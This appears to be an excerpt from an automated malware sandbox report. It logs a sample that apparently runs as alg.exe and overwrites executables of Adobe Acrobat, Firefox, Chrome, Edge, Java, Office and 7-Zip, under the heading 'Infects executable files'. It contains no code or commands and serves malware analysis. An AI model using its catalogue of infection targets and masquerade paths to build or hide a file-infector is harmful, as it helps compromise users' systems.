Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to behavior
